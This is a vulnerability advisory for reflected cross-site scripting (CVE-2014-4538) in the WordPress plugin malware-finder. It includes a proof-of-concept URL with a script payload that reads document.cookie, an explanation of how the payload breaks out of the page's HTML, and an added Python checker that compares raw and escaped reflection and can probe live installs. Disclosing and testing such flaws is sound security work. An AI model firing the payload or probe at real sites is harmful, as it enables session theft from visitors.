wp-plugin : malware-finder

Plugin Details
Plugin Name: wp-plugin : malware-finder
Affected Version : 1.1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

PoC:http://localhost/wordpress/wp-content/wp-plugs/malwarefinder/process.php?query=query%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

The query parameter decodes to query'><script>alert(document.cookie)</script>. The leading '> is there to break out of the HTML the value is echoed into, after which the script tag runs in the origin of the WordPress site; alert(document.cookie) is only a visible marker, the same position could exfiltrate the cookie or perform actions as the victim. The request needs no session, so any visitor who can be made to open the link is affected (reflected XSS).

Vulnerable Parameter : query
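The following is an added reflection check for this class of bug, not code from the advisory or from the malware-finder plugin. It decodes the PoC URL above, then runs the same "is the raw payload present in the response" test against two constructed pages: one that echoes the parameter unencoded (the behaviour the advisory describes) and one that passes it through attribute-safe HTML escaping. The single-quoted attribute context is an assumption inferred from the payload's leading '> (the plugin's real markup is not shown here), and probe() is a plain urllib helper for running the same test against a live target.

```python
"""
Reflected-XSS reflection check for the malware-finder PoC (added example).

Nothing here is taken from the plugin's source; the two page generators
below are constructed stand-ins for "echoes raw input" vs "escapes input".
"""
import html
import urllib.request
from urllib.parse import parse_qs, urlsplit

# PoC URL exactly as given in the advisory.
POC_URL = (
    "http://localhost/wordpress/wp-content/wp-plugs/malwarefinder/process.php"
    "?query=query%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
)
PARAM = "query"


def poc_payload(url: str, param: str = PARAM) -> str:
    """Return the URL-decoded value of the vulnerable parameter."""
    values = parse_qs(urlsplit(url).query)
    return values[param][0]


def reflects_unescaped(body: str, payload: str) -> bool:
    """True when the payload appears verbatim in the response, i.e. the
    angle brackets and quote survived output encoding and the browser will
    parse the injected <script> tag."""
    return payload in body


def vulnerable_page(query: str) -> str:
    """Constructed stand-in for a handler that echoes $_GET['query'] raw
    into a single-quoted attribute (assumed context, see lead-in)."""
    return f"<form><input name='query' value='{query}'></form>"


def hardened_page(query: str) -> str:
    """Same page with attribute-safe escaping (PHP equivalent:
    htmlspecialchars($q, ENT_QUOTES))."""
    return f"<form><input name='query' value='{html.escape(query, quote=True)}'></form>"


def probe(url: str, timeout: float = 5.0) -> str:
    """Fetch a live URL and return its body (for use against a test instance)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def verdict(body: str, payload: str) -> str:
    """Human-readable summary used by main() and by the test."""
    return "VULNERABLE: payload reflected unescaped" if reflects_unescaped(body, payload) \
        else "not reflected unescaped"


def main() -> None:
    payload = poc_payload(POC_URL)
    print("decoded payload:", payload)
    for name, page in (("raw echo", vulnerable_page), ("escaped", hardened_page)):
        body = page(payload)
        print(f"{name:9s} -> {verdict(body, payload)}")
        print("   ", body)


if __name__ == "__main__":
    main()
```

To check a real install, replace the constructed page with `probe(POC_URL)` and feed the body to `verdict()`; a match means the output encoding is missing, while an escaped reflection (`&lt;script&gt;`) is the expected fixed behaviour.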


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4538
Plugin Description :
[ Malware is a huge challenge in managing a Wordpress blog, not to mention that it can take hours to find where malicious code is hiding. But most likely you have access to at least one file (i.e. your homepage) that has been infected with malicious code. Just paste a small piece of that code below and the plugin will search through your entire Wordpress installation, providing the EXACT locations of the infected files! Please note that you WILL NOT be able to use this plugin if you are UNABLE to access your Wordpress Dashboard. ]